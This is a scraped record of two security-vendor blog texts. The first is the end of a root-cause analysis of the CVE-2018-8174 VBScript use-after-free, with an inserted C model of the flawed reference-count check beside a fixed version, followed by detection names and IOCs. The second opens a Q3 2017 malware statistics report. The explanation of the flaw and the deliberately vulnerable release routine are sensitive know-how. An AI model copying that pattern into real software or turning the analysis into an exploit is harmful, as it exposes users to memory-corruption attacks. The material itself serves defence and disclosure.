To trigger the vulnerability, this code could be minimized to the following proof-of-concept (PoC):\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133249/180508-the-king-is-dead-cve-18-11.png>)\n\n_CVE-2018-8174 Proof Of Concept_\n\nWhen we then launch this PoC in Internet Explorer with page heap enabled, we can observe a crash at the OLEAUT32!VariantClear function.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133256/180508-the-king-is-dead-cve-18-12.png>)\n\n_Access Violation on a call to freed memory_\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133304/180508-the-king-is-dead-cve-18-13.png>)\n\n_Freed memory pointer is reused when the second array (ArrB) is destroyed_\n\nWith this PoC we were able to trigger a use-after-free vulnerability; both ArrA(1) and ArrB(1) were referencing the same 'ClassVuln' object in memory. This is possible because when \"Erase ArrA\" is called, the vbscript!VbsErase function determines that the type of the object to delete is a SafeArray, and then calls OLEAUT32!SafeArrayDestroy.\n\nIt checks that the pointer to a [tagSafeArray structure](<https://msdn.microsoft.com/en-us/library/windows/desktop/ms221482\\(v=vs.85\\).aspx>) is not NULL and that its reference count, stored in the cLocks field, is zero, and then continues to call ReleaseResources.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133315/180508-the-king-is-dead-cve-18-14.png>)\n\n_VARTYPE of ArrA(1) is VT_DISPATCH, so VBScriptClass::Release is called to destruct the object_\n\nReleaseResources, in turn, will check the fFeatures flags variable, and since we have an array of VARIANTs, it will subsequently call VariantClear, a function that iterates over each member of an array, performs the necessary deinitialization and calls the relevant class destructor if necessary. 
In this case, VBScriptClass::Release is called to destroy the object correctly and to handle destructors like Class_Terminate, since the VARTYPE of ArrA(1) is VT_DISPATCH.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133323/180508-the-king-is-dead-cve-18-15.png>)

_Root cause of CVE-2018-8174: 'refCount' is checked only once, before the TerminateClass function_

This ends up being the root cause of the vulnerability. Inside the VBScriptClass::Release function, the reference count is checked only once, at the beginning of the function. Even though it can be (and actually is, in the PoC) incremented in an overloaded TerminateClass function, no further check is made before the class object is finally freed.

[Class_Terminate](<https://docs.microsoft.com/en-us/dotnet/visual-basic/programming-guide/language-features/objects-and-classes/object-lifetime-how-objects-are-created-and-destroyed>) is a deprecated method, now replaced by the 'Finalize' procedure. It is used to free acquired resources during object destruction and is executed as soon as the object is set to Nothing and there are no more references to it. In our case, the Class_Terminate method is overloaded, and when a call to VBScriptClass::TerminateClass is made, it is dispatched to the overloaded method instead. Inside that overloaded method, another reference is created to the ArrA(1) member. At this point ArrB(1) references ArrA(1), which holds a soon-to-be-freed ClassVuln object.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/08133332/180508-the-king-is-dead-cve-18-16.png>)

_Crash due to calling an invalid virtual method when freeing the second object_

After the Class_Terminate sub is finished, the object at ArrA(1) is freed, but ArrB(1) still maintains a reference to that freed class object.
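The check-once pattern described above, modelled in C as an added example (a constructed model, not vbscript.dll code; obj_t, release_check_once, release_recheck, copy_reference_hook and replay_erase_sequence are this example's own names): the vulnerable release tests the count before the terminate hook and frees regardless, while the hardened release re-reads the count after the hook, so a reference taken by script code during termination keeps the object alive.

```c
#include <stdio.h>
#include <stdlib.h>

/* Constructed model of a reference-counted script object. It is NOT
 * vbscript.dll code, and every name below is this example's own. The two
 * release routines differ only in whether the count is re-read after the
 * terminate hook has run. */

typedef struct obj obj_t;
typedef void (*terminate_hook_t)(obj_t *self, void *ctx);

struct obj {
    long refcount;
    int alive;                      /* 1 while the memory is valid, 0 once "freed" */
    terminate_hook_t on_terminate;  /* stands in for an overloaded Class_Terminate */
    void *ctx;
};

obj_t *obj_new(terminate_hook_t hook, void *ctx) {
    obj_t *o = calloc(1, sizeof *o);
    if (o == NULL)
        abort();
    o->refcount = 1;
    o->alive = 1;
    o->on_terminate = hook;
    o->ctx = ctx;
    return o;
}

void obj_addref(obj_t *o) { o->refcount++; }

/* Vulnerable pattern (the one the write-up describes): the count is tested
 * once, before the terminate hook, and the free follows unconditionally.
 * Returns 1 when the object was freed. */
int release_check_once(obj_t *o) {
    if (--o->refcount > 0)
        return 0;
    if (o->on_terminate != NULL)
        o->on_terminate(o, o->ctx);  /* script code runs here and may AddRef */
    o->alive = 0;                    /* models the real free() */
    return 1;
}

/* Hardened pattern: run the hook at most once, then re-read the count; a
 * reference taken inside the hook keeps the object alive. */
int release_recheck(obj_t *o) {
    if (--o->refcount > 0)
        return 0;
    if (o->on_terminate != NULL) {
        terminate_hook_t hook = o->on_terminate;
        o->on_terminate = NULL;      /* a destructor must not run twice */
        hook(o, o->ctx);
    }
    if (o->refcount > 0)
        return 0;                    /* resurrected by the hook: keep it */
    o->alive = 0;
    return 1;
}

/* Models the overloaded Class_Terminate in the PoC: it stores a second
 * reference to the dying object in another array slot (ArrB(1)). */
void copy_reference_hook(obj_t *self, void *ctx) {
    obj_t **other_slot = ctx;
    *other_slot = self;
    obj_addref(self);
}

/* Replays the PoC sequence against a chosen release routine:
 *   Erase ArrA -> the hook copies ArrA(1) into ArrB(1)
 *   Erase ArrB -> the engine would now call into the object
 * Returns 1 if the second erase would touch freed memory, 0 if not. */
int replay_erase_sequence(int (*release)(obj_t *)) {
    obj_t *arr_b = NULL;
    obj_t *arr_a = obj_new(copy_reference_hook, &arr_b);
    int uaf = 0;

    release(arr_a);                  /* "Erase ArrA" */
    if (arr_b != NULL && !arr_b->alive)
        uaf = 1;                     /* ArrB(1) now points at freed memory */
    else if (arr_b != NULL)
        release(arr_b);              /* "Erase ArrB": clean final release */

    free(arr_a);                     /* arr_a and arr_b alias one block */
    return uaf;
}

int main(void) {
    printf("check-once release: use-after-free = %d\n",
           replay_erase_sequence(release_check_once));   /* 1 */
    printf("re-check release:   use-after-free = %d\n",
           replay_erase_sequence(release_recheck));      /* 0 */
    return 0;
}
```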
When execution continues and ArrB is erased, the whole cycle repeats, except that this time ArrB(1) is referencing a freed ClassVuln object, and so we observe a crash when one of the virtual methods in the ClassVuln vtable is called.

### **Conclusion**

In this write-up we analyzed the core reasons behind CVE-2018-8174, a particularly interesting use-after-free vulnerability that was possible due to incorrect object lifetime handling in the Class_Terminate VBScript method. The exploitation process is different from what we've seen in exploits for older vulnerabilities (CVE-2016-0189 and CVE-2014-6332), as the Godmode technique is no longer used. The full exploitation chain is as interesting as the vulnerability itself, but is out of the scope of this article.

With CVE-2018-8174 being the first public exploit to use a URL moniker to load an IE exploit in Word, we believe that this technique, unless fixed, will be heavily abused by attackers in the future, as it forces IE to load while ignoring the default browser settings on a victim's system.

We expect this vulnerability to become one of the most exploited in the near future, as it won't be long until exploit kit authors start abusing it in both drive-by (via browser) and spear-phishing (via document) campaigns. To stay protected, we recommend applying the latest security updates and using a security solution with [behavior detection capabilities](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>).

In our opinion this is the same exploit which the Qihoo360 Core Security Team called "Double Kill" in their [recent publication](<https://weibo.com/ttarticle/p/show?id=2309404230886689265523>).
While this exploit is not limited to browser exploitation, it was reported as an IE zero-day, which caused some confusion in the security community.

After finding this exploit we immediately shared the relevant information with Microsoft; they confirmed that it is in fact [CVE-2018-8174](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8174>), and we received an acknowledgement for the report.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/10092043/180508-the-king-is-dead-cve-18-20.png>)

_This exploit was found in the wild and was used by an APT actor. More information about that APT actor and usage of the exploit is available to customers of Kaspersky Intelligence Reporting Service. Contact: intelreports@kaspersky.com_

### **Detection**

Kaspersky Lab products successfully detect and block all stages of the exploitation chain and payload with the following verdicts:

 * HEUR:Exploit.MSOffice.Generic – RTF document
 * PDM:Exploit.Win32.Generic – IE exploit – detection with [Automatic Exploit Prevention technology](<https://www.kaspersky.com/enterprise-security/wiki-section/products/automatic-exploit-prevention-aep>)
 * HEUR:Exploit.Script.Generic – IE exploit
 * HEUR:Trojan.Win32.Generic – Payload

### **IOCs**

 * b48ddad351dd16e4b24f3909c53c8901 – RTF document
 * 15eafc24416cbf4cfe323e9c271e71e7 – Internet Explorer exploit (CVE-2018-8174)
 * 1ce4a38b6ea440a6734f7c049f5c47e2 – Payload
 * autosoundcheckers[.]com", "cvss3": {}, "published": "2018-05-09T06:00:56", "type": "securelist", "title": "The King is dead. 
Long live the King!", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2014-6332", "CVE-2016-0189", "CVE-2017-0199", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-8174"], "modified": "2018-05-09T06:00:56", "id": "SECURELIST:4FE9AF32AEB194433587B75288D50FDA", "href": "https://securelist.com/root-cause-analysis-of-cve-2018-8174/85486/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-10T11:33:49", "description": "

## Q3 figures

According to KSN data, Kaspersky Lab solutions detected and repelled **277,646,376** malicious attacks from online resources located in 185 countries all over the world.

**72,012,219** unique URLs were recognized as malicious by web antivirus components.

Attempted infections by malware that aims to steal money via online access to bank accounts were registered on **204,388** user computers.

Crypto ransomware attacks were blocked on **186,283** computers of unique users.

Kaspersky Lab's file antivirus detected a total of **198,228,428** unique malicious and potentially unwanted objects.

Kaspersky Lab mobile security products detected:

 * **1,598,196** malicious installation packages;
 * **19,748** mobile banking Trojans (installation packages);
 * **108,073** mobile ransomware Trojans (installation packages).

## Mobile threats

### Q3 events

#### The spread of the Asacub banker

In the third quarter, we continued to monitor the activity of the mobile banking Trojan Trojan-Banker.AndroidOS.Asacub, which actively spread via SMS spam. Q3 saw cybercriminals carry out a major campaign to distribute the Trojan, resulting in a tripling of the number of users attacked.
Asacub activity peaked in July, after which there was a decline in the number of attacks: in September we registered almost three times fewer attacked users than in July.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-1-en.jpg>)

Number of unique users attacked by Trojan-Banker.AndroidOS.Asacub in Q2 and Q3 2017

#### New capabilities of mobile banking Trojans

Q3 2017 saw two significant events in the world of mobile banking Trojans.

Firstly, the Svpeng family of mobile banking Trojans acquired the [new modification Trojan-Banker.AndroidOS.Svpeng.ae](<https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/>), capable of granting all the necessary rights to itself and stealing data from other applications. To do this, it just needs to persuade the user to allow the Trojan to use the special functions designed for people with disabilities. As a result, the Trojan can intercept text that a user is entering, steal text messages and even prevent itself from being removed.

Interestingly, in August we discovered yet another modification of Svpeng that uses these special features. Only this time the Trojan was not banking related: instead of stealing data, it encrypts all the files on a device and demands a ransom in bitcoins.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-2.jpg>)

Trojan-Banker.AndroidOS.Svpeng.ag window containing the ransom demand

Secondly, the FakeToken family of mobile banking Trojans [has expanded the list of apps it attacks](<https://securelist.com/booking-a-taxi-for-faketoken/81457/>). Where previously representatives of this family mostly overlaid banking and some Google apps (e.g. Google Play Store) with a phishing window, it now also overlays apps used to book taxis, air tickets and hotels.
The aim of the Trojan is to harvest data from bank cards.

#### The growth of WAP billing subscriptions

In the third quarter of 2017, we continued to monitor the increased activity of Trojans designed to [steal](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) users' money via subscriptions. To recap, these are Trojans capable of visiting sites that allow users to pay for services by deducting money from their mobile phone accounts. These Trojans can usually click buttons on such sites using special JS files, and thus make payments without the user's knowledge.

Our Top 20 most popular Trojan programs in Q3 2017 included three malware samples that attack WAP subscriptions: Trojan-Dropper.AndroidOS.Agent.hb and Trojan.AndroidOS.Loapi.b in fourth and fifth place, and Trojan-Clicker.AndroidOS.Ubsod.b in seventh.

### Mobile threat statistics

In the third quarter of 2017, Kaspersky Lab detected 1,598,196 malicious installation packages, which is 1.2 times more than in the previous quarter.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-3-en.jpg>)

Number of detected malicious installation packages (Q4 2016 – Q3 2017)

#### Distribution of mobile malware by type

[](<https://securelist.com/files/2017/11/q3-2017-statistics-4-en.jpg>)

Distribution of new mobile malware by type (Q2 and Q3 2017)

RiskTool (53.44%) demonstrated the highest growth in Q3 2017, with its share increasing by 12.93 percentage points (p.p.). The majority of all installation packages discovered belonged to the RiskTool.AndroidOS.Skymobi family.

Trojan-Dropper malware (10.97%) came second in terms of growth rate: its contribution increased by 6.29 p.p. Most of the installation packages are detected as Trojan-Dropper.AndroidOS.Agent.hb.

The share of Trojan-Ransom programs, which was first in terms of growth rate in the first quarter of 2017, continued to fall and accounted for 6.69% in Q3, which is 8.4 p.p.
less than in the previous quarter. The percentage of Trojan-SMS malware also fell considerably, to 2.62% – almost 4 p.p. less than in Q2.

In Q3, Trojan-Clicker malware broke into this rating after its contribution increased from 0.29% to 1.41% in the space of three months.

#### TOP 20 mobile malware programs

_Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware._

No. | Verdict | % of attacked users*
---|---|---
1 | DangerousObject.Multi.Generic | 67.14
2 | Trojan.AndroidOS.Boogr.gsh | 7.52
3 | Trojan.AndroidOS.Hiddad.ax | 4.56
4 | Trojan-Dropper.AndroidOS.Agent.hb | 2.96
5 | Trojan.AndroidOS.Loapi.b | 2.91
6 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.59
7 | Trojan-Clicker.AndroidOS.Ubsod.b | 2.20
8 | Backdoor.AndroidOS.Ztorg.c | 2.09
9 | Trojan.AndroidOS.Agent.gp | 2.05
10 | Trojan.AndroidOS.Sivu.c | 1.98
11 | Trojan.AndroidOS.Hiddapp.u | 1.87
12 | Backdoor.AndroidOS.Ztorg.a | 1.68
13 | Trojan.AndroidOS.Agent.ou | 1.63
14 | Trojan.AndroidOS.Triada.dl | 1.57
15 | Trojan-Ransom.AndroidOS.Zebt.a | 1.57
16 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.53
17 | Trojan.AndroidOS.Hiddad.an | 1.48
18 | Trojan.AndroidOS.Hiddad.ci | 1.47
19 | Trojan-Banker.AndroidOS.Asacub.ar | 1.41
20 | Trojan.AndroidOS.Agent.eb | 1.29

_* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab's mobile security product that were attacked._

First place was occupied by DangerousObject.Multi.Generic (67.14%), the verdict used for malicious programs detected using cloud technologies. This is basically how the very latest malware is detected.

As in the previous quarter, Trojan.AndroidOS.Boogr.gsh (7.52%) came second. This verdict is issued for files recognized as malicious by our system based on machine learning.

Trojan.AndroidOS.Hiddad.an (4.56%) was third.
The main purpose of this Trojan is to open and click advertising links received from the C&C. The Trojan requests administrator rights to prevent its removal.

Trojan-Dropper.AndroidOS.Agent.hb (2.96%) climbed from sixth in Q2 to fourth this quarter. This Trojan decrypts and runs another Trojan – a representative of the Loapi family. One of them – Trojan.AndroidOS.Loapi.b – came fifth in this quarter's Top 20. This is a complex modular Trojan whose main malicious component needs to be downloaded from the cybercriminals' server. We can assume that Trojan.AndroidOS.Loapi.b is designed to steal money via paid subscriptions.

Trojan-Dropper.AndroidOS.Hqwar.i (3.59%), the verdict used for Trojans protected by a certain packer/obfuscator, fell from fourth to sixth. In most cases, this name indicates representatives of the [FakeToken](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Faketoken>) and [Svpeng](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Svpeng>) mobile banking families.

In seventh was Trojan-Clicker.AndroidOS.Ubsod.b, a small basic Trojan that receives links from a C&C and opens them. We wrote about this family in more detail in our [review of Trojans](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) that steal money using WAP subscriptions.

Trojan Backdoor.AndroidOS.Ztorg.c came eighth. This is one of the most active advertising Trojans that uses superuser rights. In the third quarter of 2017, our Top 20 included eight Trojans that try to obtain or use root rights and which make use of advertising as their main means of monetization. Their goal is to deliver ads to the user more aggressively, applying (among other methods) hidden installation of new advertising programs. At the same time, superuser privileges help them 'hide' in the system folder, making it very difficult to remove them.
It's worth noting that the quantity of this type of malware in the Top 20 has been decreasing (in Q1 2017, there were 14 of these Trojans in the rating, while in Q2 the number was 11).

Trojan.AndroidOS.Agent.gp (2.05%), which steals money from users by making calls to premium numbers, rose from fifteenth to ninth. Due to its use of administrator rights, it resists attempts to remove it from an infected device.

Occupying fifteenth this quarter was Trojan-Ransom.AndroidOS.Zebt.a, the first ransom Trojan in this Top 20 rating in 2017. This is a fairly simple Trojan whose main goal is to block the device with its window and demand a ransom. Zebt.a tends to attack users in Europe and Mexico.

Trojan.AndroidOS.Hiddad.an (1.48%) fell to sixteenth after occupying second and third in the previous two quarters. This piece of malware imitates various popular games or programs. Interestingly, once run, it downloads and installs the application it imitated. In this case, the Trojan requests administrator rights to withstand removal. The main purpose of Trojan.AndroidOS.Hiddad.an is the aggressive display of adverts. Its main 'audience' is in Russia.

#### The geography of mobile threats

[](<https://securelist.com/files/2017/11/q3-2017-statistics-5-en.jpg>)

The geography of attempted mobile malware infections in Q3 2017 (percentage of all users attacked)

**Top 10 countries attacked by mobile malware (ranked by percentage of users attacked):**

No. | Country* | % of attacked users**
---|---|---
1 | Iran | 35.12
2 | Bangladesh | 28.30
3 | China | 27.38
4 | Côte d'Ivoire | 26.22
5 | Algeria | 24.78
6 | Nigeria | 23.76
7 | Indonesia | 22.29
8 | India | 21.91
9 | Nepal | 20.78
10 | Kenya | 20.43

_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000).
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab's mobile security product in the country._

For the third quarter in a row, Iran was the country with the highest percentage of users attacked by mobile malware – 35.12%. Bangladesh came second, with 28.3% of users there encountering a mobile threat at least once during Q3. China (27.38%) followed in third.

Russia (8.68%) came 35th this quarter (vs 26th place in Q2), France (4.9%) was 59th, the US (3.8%) 67th, Italy (5.3%) 56th, Germany (2.9%) 79th, and the UK (3.4%) 72nd.

The safest countries were Georgia (2.2%), Denmark (1.9%), and Japan (0.8%).

#### Mobile banking Trojans

Over the reporting period we detected 19,748 installation packages for mobile banking Trojans, which is 1.4 times fewer than in Q2 2017.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-6-en.jpg>)

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q4 2016 – Q3 2017)

Trojan-Banker.AndroidOS.Asacub.ar became the most popular mobile banking Trojan in Q3, replacing the long-term leader Trojan-Banker.AndroidOS.Svpeng.q. These mobile banking Trojans use phishing windows to steal credit card data and logins and passwords for online banking accounts.
In addition, they steal money via SMS services, including mobile banking.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-7-en.jpg>)

Geography of mobile banking threats in Q3 2017 (percentage of all users attacked)

**Top 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked):**

No. | Country* | % of attacked users**
---|---|---
1 | Russia | 1.20
2 | Uzbekistan | 0.40
3 | Kazakhstan | 0.36
4 | Tajikistan | 0.35
5 | Turkey | 0.34
6 | Moldova | 0.31
7 | Ukraine | 0.29
8 | Kyrgyzstan | 0.27
9 | Belarus | 0.26
10 | Latvia | 0.23

_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000).
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab's mobile security product in the country._

In Q3 2017, the Top 10 countries attacked by mobile banker Trojans saw little change: Russia (1.2%) topped the ranking again. In second and third places were Uzbekistan (0.4%) and Kazakhstan (0.36%), which came fifth and tenth respectively in the previous quarter. In these countries the Faketoken.z, Tiny.b and Svpeng.y families were the most widespread threats.

Of particular interest is the fact that Australia, a long-term resident at the top end of this rating, didn't make it into our Top 10 this quarter.
This was due to a decrease in activity by the [Trojan-Banker.AndroidOS.Acecard](<https://securelist.com/the-evolution-of-acecard/73777/>) and Trojan-Banker.AndroidOS.Marcher mobile banking families.

#### Mobile ransomware

In Q3 2017, we detected 108,073 mobile Trojan-Ransomware installation packages, which is almost half as many as in the previous quarter.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-8-en.jpg>)

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q3 2016 – Q3 2017)

In our report for Q2, [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that in the first half of 2017 we had discovered more mobile ransomware installation packages than in any other period. The reason was the Trojan-Ransom.AndroidOS.Congur family. However, in the third quarter of this year we observed a decline in this family's activity.

Trojan-Ransom.AndroidOS.Zebt.a became the most popular mobile Trojan-Ransomware in Q3, accounting for more than a third of users attacked by mobile ransomware. Second came Trojan-Ransom.AndroidOS.Svpeng.ab. Meanwhile, [Trojan-Ransom.AndroidOS.Fusob.h](<https://securelist.com/mobile-malware-evolution-2015/73839/>), which topped the rating for several quarters in a row, was only third in Q3 2017.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-9-en.jpg>)

Geography of mobile Trojan-Ransomware in Q3 2017 (percentage of all users attacked)

**Top 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked):**

No. | Country* | % of attacked users**
---|---|---
1 | US | 1.03%
2 | Mexico | 0.91%
3 | Belgium | 0.85%
4 | Kazakhstan | 0.79%
5 | Romania | 0.70%
6 | Italy | 0.50%
7 | China | 0.49%
8 | Poland | 0.49%
9 | Austria | 0.45%
10 | Spain | 0.33%

_* We eliminated countries from this ranking where the number of users of Kaspersky Lab's mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab's mobile security product in the country._

The US (1.03%) again topped the rating of countries attacked most by mobile Trojan-Ransomware; the most widespread family in the country was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of about $500 from victims to unblock their devices.

In Mexico (0.91%), which came second in Q3 2017, most mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Zebt.a. Belgium (0.85%) came third, with Zebt.a the main threat to users there too.

## Vulnerable apps exploited by cybercriminals

Q3 2017 saw continued growth in the number of attacks launched against users involving malicious Microsoft Office documents. We noted the emergence of a large number of combined documents containing an exploit as well as a phishing message – in case the embedded exploit fails.

Although two new Microsoft Office vulnerabilities, CVE-2017-8570 and CVE-2017-8759, have emerged, cybercriminals have continued to exploit CVE-2017-0199, a logical vulnerability in the processing of HTA objects that was discovered in March 2017. Kaspersky Lab statistics show that attacks against 65% of users in Q3 exploited CVE-2017-0199, and less than 1% exploited CVE-2017-8570 or CVE-2017-8759. The overall share of exploits for Microsoft Office was 27.8%.

There were no large network attacks (such as [WannaCry](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>) or [ExPetr](<https://securelist.com/from-blackenergy-to-expetr/78937/>)) launched in Q3 using vulnerabilities patched by the MS17-010 update.
However, according to KSN data, there was major growth throughout the quarter in the number of attempted exploitations of these vulnerabilities that were blocked by our Intrusion Detection System component. Unsurprisingly, the most popular exploits have been EternalBlue and its modifications, which use an SMB protocol vulnerability, although KL statistics show that EternalRomance, EternalChampion and an exploit for the CVE-2017-7269 vulnerability in IIS web servers have also been actively used by cybercriminals. EternalBlue, however, accounts for millions of blocked attempted attacks per month, while the numbers for the other exploits are much lower.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-10-en.jpg>)

Distribution of exploits used in attacks by type of application attacked, Q3 2017

The distribution of exploits by the type of attacked application this quarter was practically the same as in Q2. First place is still occupied by exploits targeting browsers and browser components, with a share of 35.0% (a decline of 4 p.p. compared to Q2). The proportion of exploits targeting Android vulnerabilities (22.7%) was almost identical to that in Q2, placing this type of attacked application once again in third behind Office vulnerabilities.

## Online threats (Web-based attacks)

_These statistics are based on detection verdicts returned by the web antivirus module that protects users at the moment when malicious objects are downloaded from a malicious/infected web page. Malicious sites are specifically created by cybercriminals; infected web resources include those whose content is created by users (e.g. forums), as well as legitimate resources._

### Online threats in the banking sector

_These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
Beginning with the first quarter of 2017, these statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._

In Q3 2017, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs capable of stealing money via online banking on 204,388 computers.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-11-en.jpg>)

Number of users attacked by financial malware, Q3 2017

#### Geography of attacks

To evaluate and compare the risk of being infected by banking Trojans and ATM and POS malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-12-en.jpg>)

Geography of banking malware attacks in Q3 2017 (percentage of all users attacked)

**TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)**

No. | Country* | % of users attacked**
---|---|---
**1** | Togo | 2.30
**2** | China | 1.91
**3** | Taiwan | 1.65
**4** | Indonesia | 1.58
**5** | South Korea | 1.56
**6** | Germany | 1.53
**7** | United Arab Emirates | 1.52
**8** | Lebanon | 1.48
**9** | Libya | 1.43
**10** | Jordan | 1.33

_These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000).
** Unique users whose computers have been targeted by banking Trojan malware attacks as a percentage of all unique users of Kaspersky Lab products in the country._

#### TOP 10 banking malware families

The table below shows the Top 10 malware families used in Q3 2017 to attack online banking users (in terms of percentage of users attacked):

No. | Name* | % of attacked users**
---|---|---
**1** | Trojan-Spy.Win32.Zbot | 27.9
**2** | Trojan.Win32.Nymaim | 20.4
**3** | Trojan.Win32.Neurevt | 10.0
**4** | Trickster | 9.5
**5** | SpyEye | 7.5
**6** | Caphaw | 6.3
**7** | Trojan-Banker.Win32.Gozi | 2.0
**8** | Shiz | 1.8
**9** | ZAccess | 1.6
**10** | NeutrinoPOS | 1.6

_* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware._

The malware families Dridex and Tinba lost their places in this quarter's Top 10. One of their former positions was occupied by the Trickster bot (accounting for 9.5% of attacked users), also known as TrickBot, a descendant of the now defunct Dyre banker. There was a small change in the leading three malicious families. First and second places are still occupied by Trojan-Spy.Win32.Zbot (27.9%) and Trojan.Win32.Nymaim (20.4%) respectively, while third place is now occupied by Trojan.Win32.Neurevt (10%), whose share grew by nearly 4 p.p.

### Cryptoware programs

#### Q3 highlights

##### Crysis rises from the dead

In our Q2 report [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that the cybercriminals behind the Crysis ransomware cryptor halted distribution of the malware and published the secret keys needed to decrypt files.
This took place in May 2017, and all propagation of the ransomware stopped completely at that time.

However, nearly three months later, in mid-August, we discovered that this Trojan had come back from the dead and had set out on a new campaign of active propagation. The email addresses used by the blackmailers were different from those used in earlier samples of Crysis. A detailed analysis revealed that the new samples of the Trojan were completely identical to the old ones apart from just one thing – the public master keys were new. Everything else was the same, including the compilation timestamp in the PE header and, more interestingly, the labels that the Trojan leaves in the service area at the end of each encrypted file. Closer scrutiny of the samples suggests that the new distributors of the malware didn't have the source code, so they just took its old body and used a hex editor to change the key and the contact email.

The above suggests that this piece of 'zombie' malware is being spread by a different group of malicious actors rather than its original developer, who disclosed all the private keys in May.

##### Surge in Cryrar attacks

The Cryrar cryptor (aka ACCDFISA) is a veteran among the ransomware Trojans that are currently being spread. It emerged way back in 2012 and has been active ever since. The cryptor is written in PureBasic and uses a legitimate RAR archiver executable to place the victim's files in password-protected RAR-sfx archives.

In the first week of September 2017 we recorded a dramatic rise in the number of attempted infections with Cryrar – a surge never seen before or since. The malicious actors used the following approach: they brute-force the RDP password, authenticate to the victim's system using the remote access protocol and manually launch the Trojan's installation file.
The latter, in turn, installs the cryptor's body and the components it requires (including the renamed RAR.EXE file), and then automatically launches the cryptor.

According to KSN data, this wave of attacks primarily targeted Vietnam, China, the Philippines and Brazil.

##### Master key to original versions of Petya/Mischa/GoldenEye published

In July 2017, the authors of the [Petya Trojan](<https://securelist.com/petya-the-two-in-one-trojan/74609/>) published their master key, which can be used to decrypt the Salsa keys required to decrypt the MFT and unblock access to systems affected by Petya/Mischa or GoldenEye.

This happened shortly after the [ExPetr epidemic](<https://securelist.com/schroedingers-petya/78870/>), which used part of the GoldenEye code. This suggests that the authors of Petya/Mischa/GoldenEye did so in an attempt to distance themselves from the ExPetr attack and the outcry that it caused.

Unfortunately, this master key won't help those affected by ExPetr, as its creators [didn't include](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>) the option of restoring a Salsa key to decrypt the MFT.

#### The number of new modifications

In Q3 2017, we identified five new ransomware families in this classification. It's worth noting here that this number doesn't include all the Trojans that weren't assigned their own 'personal' verdict. Each quarter, dozens of these malicious programs emerge, though they either have so few distinctive characteristics or occur so rarely that they, and the hundreds of others like them, remain nameless and are detected with generic verdicts.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-13-en.jpg>)

Number of newly created cryptor modifications, Q3 2016 – Q3 2017

The number of new cryptor modifications continues to decline compared to previous quarters.
